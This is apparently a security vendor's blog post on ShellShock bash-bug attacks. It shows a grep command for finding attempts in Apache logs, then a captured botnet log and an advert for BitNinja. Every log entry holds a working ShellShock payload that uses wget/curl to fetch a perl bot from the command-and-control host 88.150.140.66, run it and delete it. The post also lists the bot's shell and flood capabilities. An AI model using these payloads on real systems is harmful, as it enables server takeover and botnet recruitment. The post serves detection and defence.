Protect your server from ShellShock attacks with BitNinja

Many servers are still being involved in ShellShock vulnerability, providing a remote exploit opportunity for attackers.

What does it mean?

If your server wasn’t patched against the ShellShock bash bug that was discovered recently, then attackers can easily get root access over it through a special HTTP request. Recently, whole botnets started expanding by the exploitation of this vulnerability. The best defense for fending off ShellShock attacks is updating the bash program and patching the bug. In addition, the research of our team has found that so far an average 9 out of 10 ShellShock attacks have been blocked by BitNinja without the ShellShock filter. Development of BitNinja’s analyzing module (SenseLog) is in full swing. Therefore, we can grant immediate defense against ShellShock attacks by the analysis of log files.

Have you perceived ShellShock attempts lately?

You can easily check by issuing this command:

cat /var/log/apache2/access.log | grep '() { :;};'

(in the case of apache web server default log placement)

Here you can see an example from one of our webservers. It is a botnet, trying to exploit the ShellShock vulnerability from several different IP addresses.

***.hu 174.127.72.77 - - [25/Nov/2014:17:55:43 +0100] "GET /cgi-bin/sys.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/ig.exe ; curl -O http://88.150.140.66/ig.exe ; perl ig.exe ; rm -rf /var/tmp/ig.exe;rm -rf ig.exe*""***.hu 85.25.26.251 - - [27/Nov/2014:14:59:06 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.hu 85.25.26.251 - - [27/Nov/2014:15:12:34 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 301 336 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.com 85.25.26.251 - - [27/Nov/2014:15:14:34 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 294 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.hu 85.25.26.251 - - [27/Nov/2014:15:16:35 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 294 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.hu 85.25.26.251 - - [27/Nov/2014:15:17:24 +0100] "GET /cgi-bin/sip.cgi HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.hu 89.19.10.178 - - [27/Nov/2014:18:22:18 +0100] "GET /cgi-bin/sys.cgi HTTP/1.0" 404 296 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.com 87.119.221.6 - - [27/Nov/2014:21:42:13 +0100] "GET /cgi-bin/admin.cgi HTTP/1.0" 404 303 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/mid ; curl -O http://88.150.140.66/mid;perl mid;rm -rf mid""***.hu 92.242.4.130 - - [01/Dec/2014:06:05:30 +0100] "GET /cgi-bin/bin.cgi HTTP/1.0" 404 298 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/midx ; curl -O http://88.150.140.66/midx;perl midx;rm -rf midx*""***.hu 92.242.4.130 - - [01/Dec/2014:06:05:33 +0100] "GET /cgi-bin/bin.cgi HTTP/1.0" 404 292 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/midx ; curl -O http://88.150.140.66/midx;perl midx;rm -rf midx*""***.hu 92.242.4.130 - - [01/Dec/2014:06:06:12 +0100] "GET /cgi-bin/bin.cgi HTTP/1.0" 404 297 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://88.150.140.66/midx ; curl -O http://88.150.140.66/midx;perl midx;rm -rf midx*""

What do they have in common?

The 88.150.140.66 C&C (Command and Control) server. This server provides the control for the botnet and this is where cancellation of the infectious perl robot file starts from. http://88.150.140.66/mid is a botnet controller program, written in Pearl.

What is it for?

• waiting for commands through irc

• complete shell run

• tcp flood

• udp flood

• running optional HTTP requests (further expansion)

Protect your server from similar attacks!


Install BitNinja

Setting up is just 3 simple steps

• Fill in the registration form to Sign up

Activate your account in the confirmation mail

Install your BitNinja to your server in 5 minutes with your favorite package manager (yum, apt-get)

That’s it! It only takes a few minutes and your servers are safe!